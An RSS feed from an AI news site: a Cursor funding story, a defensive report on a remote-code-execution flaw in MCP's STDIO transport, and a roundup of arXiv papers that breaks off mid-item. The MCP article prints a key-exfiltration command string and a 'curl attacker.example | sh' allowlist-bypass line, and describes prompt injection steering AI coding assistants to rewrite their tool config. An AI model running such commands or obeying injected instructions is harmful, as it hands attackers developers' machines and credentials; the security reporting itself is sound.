<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>Awesome Agents</title><link>https://awesomeagents.ai/</link><description>Your guide to AI models, agents, and the future of intelligence</description><language>en-us</language><managingEditor>contact@awesomeagents.ai (Awesome Agents)</managingEditor><lastBuildDate>Mon, 01 Jan 0001 00:00:00 +0000</lastBuildDate><atom:link href="https://awesomeagents.ai/index.xml" rel="self" type="application/rss+xml"/><image><url>https://awesomeagents.ai/images/logo.png</url><title>Awesome Agents</title><link>https://awesomeagents.ai/</link></image><item><title>Cursor Targets $50B Valuation - Enterprise Now Pays the Bills</title><link>https://awesomeagents.ai/news/cursor-50b-valuation-enterprise-round/</link><pubDate>Sat, 18 Apr 2026 01:59:49 +0200</pubDate><guid>https://awesomeagents.ai/news/cursor-50b-valuation-enterprise-round/</guid><description>&lt;p>Anysphere, the company behind Cursor, is in advanced talks to raise at least $2 billion at a pre-money valuation of $50 billion, according to sources who spoke to TechCrunch and Bloomberg on April 17. The round is already oversubscribed. Andreessen Horowitz and Thrive Capital - both returning backers - are expected to co-lead, with Battery Ventures joining as a new participant and Nvidia taking a strategic position.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Anysphere, the company behind Cursor, is in advanced talks to raise at least $2 billion at a pre-money valuation of $50 billion, according to sources who spoke to TechCrunch and Bloomberg on April 17. The round is already oversubscribed. Andreessen Horowitz and Thrive Capital - both returning backers - are expected to co-lead, with Battery Ventures joining as a new participant and Nvidia taking a strategic position.</p>
<p>If it closes at those terms, Cursor would be worth 1.7 times its November 2025 valuation of $29.3 billion, a mark set less than six months ago. In June 2025, the company was worth $9.9 billion.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Anysphere raising $2B+ at <strong>$50B pre-money valuation</strong>; round already oversubscribed</li>
<li>a16z and Thrive Capital co-leading, Battery Ventures new, Nvidia joining as strategic investor</li>
<li>ARR crossed <strong>$2 billion</strong> in February; company projects <strong>$6B+</strong> by end of 2026</li>
<li>Enterprise accounts now <strong>60% of revenue</strong> and carrying positive gross margins</li>
<li>Cursor building its own models to reduce dependency on Anthropic, OpenAI, and others</li>
</ul>
</div>
<h2 id="the-numbers-that-got-investors-here">The Numbers That Got Investors Here</h2>
<p>The case for a $50 billion valuation starts with revenue growth that has almost no precedent in enterprise software. Cursor crossed $500 million in annualized revenue by May 2025, reached $1 billion by October, and surpassed $2 billion in February 2026. The company now projects ending the year above $6 billion ARR - a tripling in under 12 months.</p>
<p>Sixty-seven percent of Fortune 500 companies use Cursor, generating around 150 million lines of enterprise code per day. Enterprise contracts account for 60% of revenue. Those enterprise accounts carry positive gross margins, which matters because Cursor's individual developer subscriptions still run at a loss.</p>
<table>
  <thead>
      <tr>
          <th>Round</th>
          <th>Date</th>
          <th>Valuation</th>
          <th>Key Investors</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Series -</td>
          <td>Jun 2025</td>
          <td>$9.9B</td>
          <td>a16z, Thrive Capital</td>
      </tr>
      <tr>
          <td>Series -</td>
          <td>Nov 2025</td>
          <td>$29.3B</td>
          <td>a16z, Thrive Capital ($2.3B round)</td>
      </tr>
      <tr>
          <td>In talks</td>
          <td>Apr 2026</td>
          <td>$50B</td>
          <td>a16z, Thrive, Battery, Nvidia</td>
      </tr>
  </tbody>
</table>
<p>The gross margin arc matters more than the headline ARR. For most of its short life, Cursor was a growth story with a margin problem: paying Anthropic, OpenAI, and other model providers a large share of every dollar it earned from developers. Two things changed that picture. Cursor launched its own Composer model in November 2025, reducing what it routes to third-party providers. It also integrated models from China's Kimi - cheaper per token than the US frontier providers - for tasks where raw coding performance is less critical.</p>
<p>The combination moved overall gross margins into slightly positive territory. Enterprise accounts, where clients pay annual contracts and run predictable workloads, now show meaningfully better margins than the developer consumer tier.</p>
<h2 id="who-benefits">Who Benefits</h2>
<h3 id="the-founders-and-existing-investors">The Founders and Existing Investors</h3>
<p>Michael Truell and his three co-founders built Anysphere out of MIT without external funding until 2024. Their equity, and that of a16z and Thrive Capital who backed early rounds, has appreciated on a path that would be unusual in any market. At $50 billion, Anysphere would rank behind only OpenAI among US AI company valuations.</p>
<p>Truell, who's 25, has been unusually direct about his competitive strategy. Rather than pretending model providers are partners, he has publicly framed the company's goal as reducing its exposure to them. &quot;We take the best intelligence that the market has to offer from many different providers,&quot; Truell told TechCrunch in December. &quot;And we also do our own product-specific models in places.&quot; The Composer launch was the first concrete step. The funding round provides capital to accelerate that work.</p>
<h3 id="enterprise-it-buyers">Enterprise IT Buyers</h3>
<p>More capital going into Cursor's enterprise engineering team benefits corporate customers directly. The company has been building spend controls, billing groups, usage dashboards, and compliance tooling - the infrastructure that large IT departments require before they can approve company-wide seat deals. With 67% of the Fortune 500 already using Cursor, renewal conversations are happening at scale for the first time.</p>
<h3 id="nvidia">Nvidia</h3>
<p>Nvidia's strategic participation is worth reading carefully. The company invests in AI software startups partly to maintain demand for its GPUs. A Cursor processing 150 million lines of enterprise code per day runs on compute, and Nvidia has a clear interest in that compute budget. It's a different rationale from the typical VC bet on returns - Nvidia is buying influence with a company that controls a meaningful slice of AI inference spend.</p>
<p><img src="/images/news/cursor-50b-valuation-enterprise-round-interface.jpg" alt="Cursor's new multi-agent interface showing parallel agent tabs and cloud-native coding workflows">
<em>The Cursor 3 interface, launched in April 2026, lets developers run multiple coding agents in parallel across local and cloud environments.</em>
<small>Source: cursor.com</small></p>
<h2 id="who-pays">Who Pays</h2>
<h3 id="new-investors-buying-at-the-peak">New Investors Buying at the Peak</h3>
<p>The investors writing checks at $50 billion are making a specific bet: that Cursor can hold its market position as both model providers and hyperscalers push competing tools. That's harder than it sounds. Anthropic's <a href="/tools/claude-code-vs-cursor-vs-codex">Claude Code</a> crossed $2.5 billion in annualized revenue by February 2026. OpenAI has unified Codex with its broader desktop strategy. Microsoft, which owns GitHub, is pushing Copilot into the same enterprise accounts that Cursor wants.</p>
<blockquote>
<p>&quot;It's pretty clear the market is standardizing on a couple solutions. It's a narrow field of folks really at scale here.&quot;</p>
<ul>
<li>Michael Truell, CEO of Anysphere, to Fortune, March 2026</li>
</ul></blockquote>
<p>Truell's framing is accurate, and it cuts both ways. If the market standardizes on two or three tools, Cursor could be one of them. Or Microsoft could bundle Copilot into existing enterprise agreements at a price Cursor can't match. New investors at $50 billion are paying for the optimistic scenario.</p>
<h3 id="anthropic-and-the-model-providers">Anthropic and the Model Providers</h3>
<p>Cursor's explicit goal of reducing reliance on Anthropic is a direct threat to Anthropic's model revenue. Cursor was one of Anthropic's largest API customers. Each Composer token that replaces a Claude token is revenue Anthropic doesn't see. This dynamic repeats across the AI stack: the most successful application-layer companies tend to eventually build their own models for the tasks they do at scale.</p>
<h3 id="individual-developers">Individual Developers</h3>
<p>The funding round doesn't change the economics of individual Cursor subscriptions right away, but the direction of travel is visible. Cursor's enterprise accounts carry positive margins. Its individual developer accounts do not. That cross-subsidy works until investors want profitability - which they'll eventually demand, especially with an IPO on the horizon. Individual pricing will likely go up before any Cursor listing.</p>
<p><img src="/images/news/cursor-50b-valuation-enterprise-round-investors.jpg" alt="A group of investors reviewing growth charts at a meeting table">
<em>Enterprise sales cycles and Fortune 500 adoption drove Cursor's shift from a developer tool to a boardroom purchase - and brought a different class of investor with it.</em>
<small>Source: unsplash.com</small></p>
<h2 id="counter-argument-what-bears-will-say">Counter-Argument: What Bears Will Say</h2>
<p>The bear case on Cursor has been consistent since the company's first large valuation: the product's core function - helping developers write code with AI assistance - is a commodity waiting to happen. Every major model provider wants to control the coding interface. Apple Silicon, AMD, and Intel are all chasing inference cost reductions that would make running local models viable at enterprise scale, removing Cursor's control over model selection.</p>
<p>The company's response is to be the best end-to-end tool regardless of which model sits underneath it. <a href="/news/cursor-2b-arr-fastest-saas">Cursor's $2 billion ARR milestone</a> was partly built on integrating the best available model at any given moment - switching from GPT-4 to Claude 3.5 to Gemini as each took the lead. The Composer model is an attempt to own the layer that matters most for code-specific tasks. Whether a proprietary coding model can stay competitive with Anthropic's and OpenAI's frontier research teams, with a fraction of the budget, is the real question.</p>
<hr>
<p>At $50 billion, Cursor is a bet on enterprise software margins - and the terms will be set by whether Anysphere can make its own models good enough to stop paying the companies most likely to kill it.</p>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://techcrunch.com/2026/04/17/sources-cursor-in-talks-to-raise-2b-at-50b-valuation-as-enterprise-growth-surges/">Cursor in talks to raise $2B+ at $50B valuation as enterprise growth surges - TechCrunch</a></li>
<li><a href="https://techcrunch.com/2026/03/02/cursor-has-reportedly-surpassed-2b-in-annualized-revenue/">Cursor has reportedly surpassed $2B in annualized revenue - TechCrunch</a></li>
<li><a href="https://techcrunch.com/2025/06/05/cursors-anysphere-nabs-9-9b-valuation-soars-past-500m-arr/">Cursor's Anysphere nabs $9.9B valuation, soars past $500M ARR - TechCrunch</a></li>
</ul>
]]></content:encoded><dc:creator>Daniel Okafor</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/cursor-50b-valuation-enterprise-round_hu_5448620bf4f0a0ac.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/cursor-50b-valuation-enterprise-round_hu_5448620bf4f0a0ac.jpg" width="1200" height="675"/></item><item><title>MCP&amp;#39;s STDIO Flaw Puts 200K AI Servers at Risk</title><link>https://awesomeagents.ai/news/mcp-stdio-rce-design-flaw-200k-servers/</link><pubDate>Fri, 17 Apr 2026 22:57:46 +0200</pubDate><guid>https://awesomeagents.ai/news/mcp-stdio-rce-design-flaw-200k-servers/</guid><description>&lt;p>A design decision baked into Anthropic's Model Context Protocol is putting hundreds of thousands of AI-powered servers at risk of complete takeover - and Anthropic has declined to fix it.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>A design decision baked into Anthropic's Model Context Protocol is putting hundreds of thousands of AI-powered servers at risk of complete takeover - and Anthropic has declined to fix it.</p>
<p>Ox Security, a Tel Aviv-based application security firm founded by former Check Point executives Neatsun Ziv and Lion Arzi, published its findings on April 15. The research catalogues 30+ responsible disclosures, 10 CVEs (all rated critical or high), and live proof-of-concept exploitation on six production platforms. The root cause isn't a bug in any one implementation. It's how MCP's STDIO transport was designed from the start.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>MCP's STDIO interface executes OS commands before verifying whether a valid server started - any payload gets through regardless of handshake failure</li>
<li>Affects 200K+ server instances across all 10 official MCP SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust</li>
<li>Claude Code, Cursor, Windsurf, GitHub Copilot, OpenAI Codex, and Gemini CLI are all exposed via a prompt-injection-to-local-RCE chain</li>
<li>Anthropic called the behavior &quot;expected&quot; and added a documentation note rather than adjusting the protocol</li>
</ul>
</div>
<h2 id="how-stdio-transport-actually-executes-commands">How STDIO Transport Actually Executes Commands</h2>
<p>MCP supports two transport mechanisms: HTTP+SSE for remote connections and STDIO for local ones. When a host application - Claude Code or Cursor, for instance - needs to spawn an MCP server, it passes a command string to the STDIO interface. That interface launches the subprocess, then waits for the MCP handshake to succeed.</p>
<p>The problem is that the command executes before the handshake check.</p>
<pre tabindex="0"><code># Simplified execution sequence with a malicious command string:
1. MCP STDIO receives: &#34;malicious-payload &amp;&amp; exfiltrate-keys&#34;
2. OS executes the command string  -&gt;  payload runs
3. MCP handshake fails (no valid server started)
4. Error is returned to the caller
# The payload already ran. The error doesn&#39;t matter.
</code></pre><p>Ox researchers describe this as &quot;execute first, validate never.&quot; Any user-controlled string that reaches the STDIO configuration layer becomes a potential RCE vector. No authentication required. No sandboxing applied. This behavior runs through all ten official MCP SDK implementations.</p>
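<p>The pattern Ox recommends amounts to inverting that order: parse the command without a shell, validate it against an explicit policy, and only then spawn the process that the handshake will check. The sketch below shows that host-side ordering in Python - it is illustrative only, not the MCP SDK's API, and the allowlisted path is a placeholder.</p>
<pre tabindex="0"><code>import shlex
import shutil
import subprocess

# Hypothetical policy: servers are pinned by absolute path, nothing else launches.
ALLOWED_SERVERS = {"/usr/local/bin/example-mcp-server"}

def spawn_stdio_server(command: str) -&gt; subprocess.Popen:
    argv = shlex.split(command)               # no shell: "&amp;&amp;", "|", ";" stay inert
    resolved = shutil.which(argv[0]) if argv else None
    if resolved not in ALLOWED_SERVERS:       # validate BEFORE anything executes
        raise PermissionError("refusing to launch: " + command)
    return subprocess.Popen(
        [resolved, *argv[1:]],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        shell=False,                          # never route the string through a shell
    )
</code></pre>
<p>With that ordering, a payload like the one in the sequence above fails the policy check and nothing runs; the handshake only ever sees a process that was explicitly permitted to start.</p>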
<h2 id="the-four-attack-families">The Four Attack Families</h2>
<h3 id="1-direct-ui-injection">1. Direct UI Injection</h3>
<p>The simplest path. Frameworks like LangFlow (CVE pending) and GPT Researcher (CVE-2025-65720) expose web interfaces that accept MCP configuration directly. For LangFlow, no account is needed - a session token is &quot;freely available,&quot; per Ox's report. Sending a crafted payload through the UI gets arbitrary code running on the server. Agent Zero (CVE-2026-30624) falls to the same class of attack via its unauthenticated interface.</p>
<h3 id="2-hardening-bypass">2. Hardening Bypass</h3>
<p>Some tools tried allowlisting to restrict which commands could run. Flowise (GHSA-c9gw-hvqq) had one - researchers bypassed it by routing commands through <code>npx</code>'s <code>-c</code> flag, which the allowlist didn't cover. Upsonic (CVE-2026-30625) fell to a similar approach. The lesson from both: as long as the underlying STDIO execution model runs commands before validating them, surface-level allowlists provide false confidence.</p>
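<p>A toy version of why such checks fail: an allowlist that inspects only the executable name never looks at the arguments, and the payload travels as an argument. The snippet below illustrates the failure mode; it is not Flowise's or Upsonic's actual code.</p>
<pre tabindex="0"><code># Hypothetical allowlist that only checks the binary name
ALLOWED_BINARIES = {"npx", "node", "uvx"}

def passes_allowlist(command: str) -&gt; bool:
    # Only the first token is inspected - argument payloads sail through
    return command.split()[0] in ALLOWED_BINARIES

passes_allowlist("npx some-mcp-server")                  # True, as intended
passes_allowlist('npx -c "curl attacker.example | sh"')  # also True: -c hands the string to a shell
</code></pre>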
<h3 id="3-prompt-injection-to-local-rce">3. Prompt Injection to Local RCE</h3>
<p>This is the attack chain that reaches the tools most developers use every day. An AI coding assistant processes content from a web page, a document, or a code repository. That content carries a prompt injection payload instructing the assistant to modify its MCP server configuration. The assistant writes the malicious command to STDIO config. STDIO executes it.</p>
<p>Windsurf received CVE-2026-30615 for a zero-click variant - visiting a malicious website was enough to trigger the full chain. Claude Code, Cursor, GitHub Copilot, OpenAI Codex, and Gemini CLI require some user interaction, but Ox confirms all are within the exposure window. Their respective vendors classified this as &quot;by design.&quot;</p>
<p><img src="/images/news/mcp-stdio-rce-design-flaw-200k-servers-code-screen.jpg" alt="Binary code streaming down a dark terminal screen">
<em>The attack chain turns AI coding assistants into the delivery mechanism - the same tool that reads your source code can be instructed to execute arbitrary commands on your machine.</em>
<small>Source: unsplash.com</small></p>
<h3 id="4-marketplace-poisoning">4. Marketplace Poisoning</h3>
<p>Ox tested 11 MCP marketplace directories. Nine accepted malicious MCP entries without review. A poisoned entry sits in the directory waiting for developers to install it. Once installed, it can quietly swap a legitimate SSE transport connection out for a local STDIO connection. At that point, the attacker controls what runs on the developer's machine.</p>
<h2 id="confirmed-cves">Confirmed CVEs</h2>
<table>
  <thead>
      <tr>
          <th>Tool / Framework</th>
          <th>CVE</th>
          <th>Attack Type</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Windsurf (AI IDE)</td>
          <td>CVE-2026-30615</td>
          <td>Prompt injection - local RCE (zero-click)</td>
      </tr>
      <tr>
          <td>LiteLLM</td>
          <td>CVE-2026-30623</td>
          <td>Authenticated config injection</td>
      </tr>
      <tr>
          <td>Agent Zero</td>
          <td>CVE-2026-30624</td>
          <td>Unauthenticated injection</td>
      </tr>
      <tr>
          <td>GPT Researcher</td>
          <td>CVE-2025-65720</td>
          <td>UI injection - reverse shell</td>
      </tr>
      <tr>
          <td>Fay Framework</td>
          <td>CVE-2026-30618</td>
          <td>Direct injection</td>
      </tr>
      <tr>
          <td>Upsonic</td>
          <td>CVE-2026-30625</td>
          <td>Allowlist bypass</td>
      </tr>
      <tr>
          <td>Flowise</td>
          <td>GHSA-c9gw-hvqq</td>
          <td>npx flag injection</td>
      </tr>
      <tr>
          <td>LangFlow</td>
          <td>CVE pending</td>
          <td>Unauthenticated session takeover</td>
      </tr>
      <tr>
          <td>DocsGPT</td>
          <td>CVE-2026-26015</td>
          <td>Transport-layer substitution</td>
      </tr>
  </tbody>
</table>
<p>Claude Code, Cursor, GitHub Copilot, and Gemini CLI don't appear in the CVE list - not because they're safe, but because their vendors declined to assign CVEs, treating the prompt-injection path as an accepted risk in the current threat model.</p>
<p><img src="/images/news/mcp-stdio-rce-design-flaw-200k-servers-ide-terminal.jpg" alt="Developer at a workstation with multiple security warning alerts on screen">
<em>MCP-enabled IDEs are high-value targets: they run with local file access, network access, and often terminal permissions on the developer's machine.</em>
<small>Source: unsplash.com</small></p>
<h2 id="the-disclosure-timeline">The Disclosure Timeline</h2>
<ul class="timeline">
<li>
<p><strong>November 2025</strong> - Ox Security begins investigating MCP's STDIO transport behavior after observing inconsistent execution semantics.</p>
</li>
<li>
<p><strong>January 7, 2026</strong> - Initial contact with Anthropic. Researchers present the root issue and propose architectural fixes that would protect all downstream implementations.</p>
</li>
<li>
<p><strong>January 16, 2026</strong> - Anthropic updates its SECURITY.md, recommending caution with STDIO adapters. No protocol changes made.</p>
</li>
<li>
<p><strong>January - March 2026</strong> - 30+ responsible disclosures filed across affected projects. LiteLLM, DocsGPT, Flowise, and Bisheng issue patches for their specific CVEs.</p>
</li>
<li>
<p><strong>March 18, 2026</strong> - LangFlow formally acknowledges the issue.</p>
</li>
<li>
<p><strong>April 15, 2026</strong> - Ox publishes the full report. The MCP protocol architecture remains unchanged.</p>
</li>
</ul>
<h2 id="where-it-falls-short">Where It Falls Short</h2>
<p>The standard defense Anthropic and affected vendors are offering is &quot;sanitize your inputs.&quot; That's correct advice in isolation - developers building MCP servers should absolutely validate anything that reaches command execution. The problem is what it means in practice for the broader ecosystem.</p>
<p>Over 200 open-source projects inherited this exposure by building on Anthropic's official SDKs. A single architectural fix at the protocol level would have protected all of them. Ox's researchers put the ask clearly: &quot;One architectural change at the protocol level would have protected every downstream project, every developer, and every end user.&quot;</p>
<p>Anthropic had five months between initial disclosure and public release to implement that fix. The company added a warning to its documentation instead.</p>
<p>This fits a pattern that's become familiar in the MCP ecosystem. A <a href="/news/kali-mcp-server-command-injection-shell-true/">command injection flaw in the Kali Linux MCP server</a> showed up in February, affecting penetration testing tools running with elevated permissions. <a href="/news/claude-code-rce-api-key-theft-vulnerabilities/">Multiple RCE paths in Claude Code itself</a> were disclosed earlier this year. Earlier still, the <a href="/news/litellm-supply-chain-compromise-credential-theft/">LiteLLM supply chain compromise</a> showed how a single widely-used inference layer becomes the delivery mechanism for downstream attacks. MCP's footprint is much larger than any of those - at 97 million monthly SDK downloads across all language implementations, the scope of an unaddressed protocol-level flaw is substantial.</p>
<h2 id="what-developers-should-do">What Developers Should Do</h2>
<p>The upstream fix isn't imminent. Mitigations to apply now:</p>
<ol>
<li><strong>Restrict MCP services to private IP addresses</strong> - don't expose MCP endpoints to the public internet under any circumstances</li>
<li><strong>Treat all MCP configuration as untrusted</strong> - any user-controlled string reaching STDIO config is a potential attack vector</li>
<li><strong>Sandbox MCP processes</strong> - run with minimal permissions, isolated from credentials, secrets, and sensitive file paths (a minimal sketch follows this list)</li>
<li><strong>Audit marketplace installs</strong> - verify MCP entries before installation; prefer packages with active maintainers and documented security review</li>
<li><strong>Apply available patches</strong> - LiteLLM, DocsGPT, Flowise, and Bisheng have addressed their specific CVEs; update right away</li>
<li><strong>Log tool invocations</strong> - monitoring what MCP-enabled tools are actually executing makes exploitation visible before damage spreads</li>
</ol>
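<p>For item 3, a minimal sketch of process isolation on a POSIX host: strip the inherited environment so API keys and tokens never reach the child process, run it from an empty scratch directory, and detach it from the caller's session. Paths and values here are placeholders, and this is a starting point rather than a full sandbox - containers or OS-level sandboxing go further.</p>
<pre tabindex="0"><code>import subprocess
import tempfile

def spawn_isolated(argv: list[str]) -&gt; subprocess.Popen:
    scratch = tempfile.mkdtemp(prefix="mcp-sandbox-")   # empty working directory, away from repos and dotfiles
    clean_env = {"PATH": "/usr/bin:/bin"}               # nothing inherited: no API keys, no cloud credentials
    return subprocess.Popen(
        argv,
        cwd=scratch,
        env=clean_env,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        start_new_session=True,                         # detach from the caller's process group
    )
</code></pre>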
<p>As of publication, Anthropic has not announced any architectural changes to the protocol. The 10 CVEs issued so far represent confirmed exploits on real production systems; Ox expects additional CVEs as more projects are audited.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://www.theregister.com/2026/04/16/anthropic_mcp_design_flaw/">Anthropic won't own MCP 'design flaw' putting 200K servers at risk - The Register</a></li>
<li><a href="https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/">Systemic Flaw in MCP Protocol Could Expose 150 Million Downloads - Infosecurity Magazine</a></li>
<li><a href="https://www.computing.co.uk/news/2026/security/flaw-in-anthropic-s-mcp-putting-200k-servers-at-risk">Flaw in Anthropic's MCP putting 200k servers at risk, researchers claim - Computing</a></li>
<li><a href="https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem/">MCP Supply Chain Advisory - Ox Security</a></li>
<li><a href="https://www.cyberkendra.com/2026/04/anthropics-mcp-design-flaw-enables.html">Anthropic's MCP Design Flaw Enables Remote Code Execution - Cyber Kendra</a></li>
<li><a href="https://www.csoonline.com/article/4159889/rce-by-design-mcp-architectural-choice-haunts-ai-agent-ecosystem.html">RCE by design: MCP architectural choice haunts AI agent ecosystem - CSO Online</a></li>
</ul>
]]></content:encoded><dc:creator>Sophie Zhang</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/mcp-stdio-rce-design-flaw-200k-servers_hu_5fa2370a01da7769.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/mcp-stdio-rce-design-flaw-200k-servers_hu_5fa2370a01da7769.jpg" width="1200" height="675"/></item><item><title>MoE Routing, Prompt Gambles, and Where Reasoning Breaks</title><link>https://awesomeagents.ai/science/moe-routing-prompt-gambles-reasoning-breaks/</link><pubDate>Fri, 17 Apr 2026 21:52:18 +0200</pubDate><guid>https://awesomeagents.ai/science/moe-routing-prompt-gambles-reasoning-breaks/</guid><description>&lt;p>Three arXiv papers landed this week that share a quieter kind of argument. None of them announce a breakthrough model or a new capability. Each one takes a practice people rely on and shows that the theory underneath it doesn't hold. MoE routing sophistication, automated prompt optimization, and brute-force compute during reasoning chains - all three come up shorter than expected.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Three arXiv papers landed this week that share a quieter kind of argument. None of them announce a breakthrough model or a new capability. Each one takes a practice people rely on and shows that the theory underneath it doesn't hold. MoE routing sophistication, automated prompt optimization, and brute-force compute during reasoning chains - all three come up shorter than expected.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>Equifinality in MoE</strong> - Five different routing designs produce statistically equivalent perplexity; routing topology is a red herring in architecture search</li>
<li><strong>Prompt Optimization Is a Coin Flip</strong> - 49% of optimization runs on Claude Haiku scored below zero-shot; a cheap two-step diagnostic tells you when it's worth trying</li>
<li><strong>GUARD</strong> - LLM reasoning errors cluster at a small number of early &quot;transition points&quot; marked by entropy spikes, not scattered randomly across the chain</li>
</ul>
</div>
<h2 id="moe-routing-topology-doesnt-determine-quality">MoE Routing Topology Doesn't Determine Quality</h2>
<p><strong>Authors:</strong> Ivan Ternovtsii and Yurii Bilak | arXiv:2604.14419</p>
<p>Sparse Mixture-of-Experts (MoE) architectures have become a standard tool for scaling LLMs without proportionally scaling compute. The design assumption is that routing - the mechanism that dispatches tokens to specific experts - is one of the main levers for quality. A more sophisticated router, the logic goes, means better expert specialization and better outcomes.</p>
<p>Ternovtsii and Bilak ran 62 controlled experiments on WikiText-103 to test that assumption directly. They built ST-MoE, a geometric routing system that uses cosine-similarity matching against learned centroids in a 64-dimensional space, then compared five variants of this approach against standard linear routers.</p>
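<p>To make the mechanism concrete: a cosine router projects each token into a small routing space and scores it by angular similarity to learned expert centroids, instead of applying a plain linear projection over experts. The PyTorch sketch below is a reconstruction from the paper's description, not the authors' released code; the class name, dimensions, and top-k choice are illustrative.</p>
<pre tabindex="0"><code>import torch
import torch.nn.functional as F

class CosineRouter(torch.nn.Module):
    """Illustrative top-k router: cosine similarity against learned centroids."""
    def __init__(self, d_model: int, n_experts: int, d_route: int = 64):
        super().__init__()
        self.proj = torch.nn.Linear(d_model, d_route, bias=False)   # project into the routing space
        self.centroids = torch.nn.Parameter(torch.randn(n_experts, d_route))

    def forward(self, x: torch.Tensor, top_k: int = 2):
        h = F.normalize(self.proj(x), dim=-1)            # unit-norm token representations
        c = F.normalize(self.centroids, dim=-1)          # unit-norm expert centroids
        scores = h @ c.t()                               # cosine similarity, shape (..., n_experts)
        weights, experts = scores.topk(top_k, dim=-1)
        return torch.softmax(weights, dim=-1), experts   # mixing weights and chosen expert indices
</code></pre>
<p>A standard linear router is simply <code>torch.nn.Linear(d_model, n_experts)</code> applied to the token directly; the paper's 62 experiments compare that baseline against variants of the structure above.</p>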
<h3 id="the-equifinality-result">The Equifinality Result</h3>
<p>All five cosine-routing variants landed within a 1-perplexity margin of each other (range: 33.93 to 34.72 PPL). Under Two One-Sided Tests (TOST) across 15 runs and 3 seeds, the differences were statistically equivalent - not just small, but within the pre-specified equivalence margin.</p>
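<p>Equivalence testing flips the usual null hypothesis: instead of asking whether two variants differ, TOST asks whether their difference fits inside a pre-declared margin. Below is a generic illustration with synthetic numbers and a +/-1 PPL margin using statsmodels - not the paper's data or analysis code.</p>
<pre tabindex="0"><code>import numpy as np
from statsmodels.stats.weightstats import ttost_ind

rng = np.random.default_rng(0)
ppl_variant_a = rng.normal(34.2, 0.4, size=15)   # stand-ins for per-run perplexities
ppl_variant_b = rng.normal(34.4, 0.4, size=15)

# Two one-sided tests against a +/-1 PPL equivalence margin; both must reject.
p_equiv, lower, upper = ttost_ind(ppl_variant_a, ppl_variant_b, low=-1.0, upp=1.0)
print(f"TOST p-value: {p_equiv:.4f}")            # small p-value: the difference sits inside the margin
</code></pre>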
<p>Standard linear routers achieved 32.76 PPL, which is noticeably better. But they used 5.3 times more routing parameters to get there. When the researchers built an iso-parameter cosine routing variant, it closed 67% of that gap. The mechanistic advantage of the linear router narrowed to roughly 1.2%.</p>
<p>The multi-hop routing updates showed cosine similarity of 0.805 between update vectors - essentially pointing in the same direction. They're doing magnitude amplification, not compositional computation. A single learnable scalar reproduced that behavior.</p>
<div class="pull-quote">
<p>Routing topology may matter less than previously assumed. Future optimization efforts should focus elsewhere.</p>
</div>
<p>The most actionable finding is the zero-shot relative-norm halting result: by stopping routing computation early based on a relative-norm criterion, the system saved 25% of MoE FLOPs with only a 0.12% PPL degradation. That's a free efficiency gain available right now, independent of routing design choices.</p>
<p><img src="/images/science/moe-routing-prompt-gambles-reasoning-breaks-routing.jpg" alt="Abstract network connectivity visualization">
<em>Network routing patterns - the complexity of routing mechanisms in MoE architectures may matter less than researchers have assumed.</em>
<small>Source: unsplash.com</small></p>
<p>For anyone doing architecture search on MoE systems, this is a significant reallocation of effort. The routing mechanism isn't where the performance comes from. Earlier work at Awesome Agents covering <a href="/science/moe-myths-context-compression-steering-proofs/">MoE routing myths and context compression</a> reached adjacent conclusions - this paper sharpens the argument with controlled experimental evidence.</p>
<hr>
<h2 id="prompt-optimization-is-a-coin-flip">Prompt Optimization Is a Coin Flip</h2>
<p><strong>Authors:</strong> Xing Zhang, Guanghui Wang, Yanwei Cui, Wei Qiu, Ziyuan Li, Bing Zhu, Peiyang He | arXiv:2604.14585</p>
<p>Automated prompt optimization frameworks like DSPy and TextGrad are now a standard part of many LLM pipelines. The assumption is that running optimization over prompts improves downstream task performance. You pay compute costs upfront, save on manual prompt engineering, and get a better system.</p>
<p>Zhang et al. tested that assumption across 72 optimization runs (6 methods × 4 tasks × 3 repeats) and 18,000 grid evaluations across 144 additional optimization runs, using Claude Haiku and Amazon Nova Lite as their target models.</p>
<h3 id="the-49-failure-rate">The 49% Failure Rate</h3>
<p>On Claude Haiku, 49% of optimization runs scored below the zero-shot baseline. Amazon Nova Lite showed an even higher failure rate. The optimization methods included approaches from the DSPy and TextGrad ecosystems along with four other automated techniques.</p>
<p>One task bucked the trend: all six methods beat zero-shot, by up to 6.8 points. That divergence is the key to understanding when optimization works and when it doesn't. The successful task had what the authors call &quot;exploitable output structure&quot; - a format the model can produce but doesn't default to. The optimizer discovers and enforces that format. Tasks without that property don't benefit.</p>
<p>The team also tested a popular assumption underlying these frameworks: that agent prompt interactions are a meaningful optimization target. Across all experiments, those interactions were never statistically significant (p &gt; 0.52, all F-statistics below 1.0). The coupling between prompts in multi-agent systems, which tools like TextGrad attempt to optimize jointly, doesn't show up as a real effect.</p>
<h3 id="the-diagnostic">The Diagnostic</h3>
<p>Rather than abandoning prompt optimization, the paper proposes a two-step check before running an expensive optimization campaign:</p>
<ol>
<li>An $80 ANOVA pre-test to assess whether agent coupling is real for the specific task</li>
<li>A 10-minute headroom test that checks whether the task has exploitable output structure</li>
</ol>
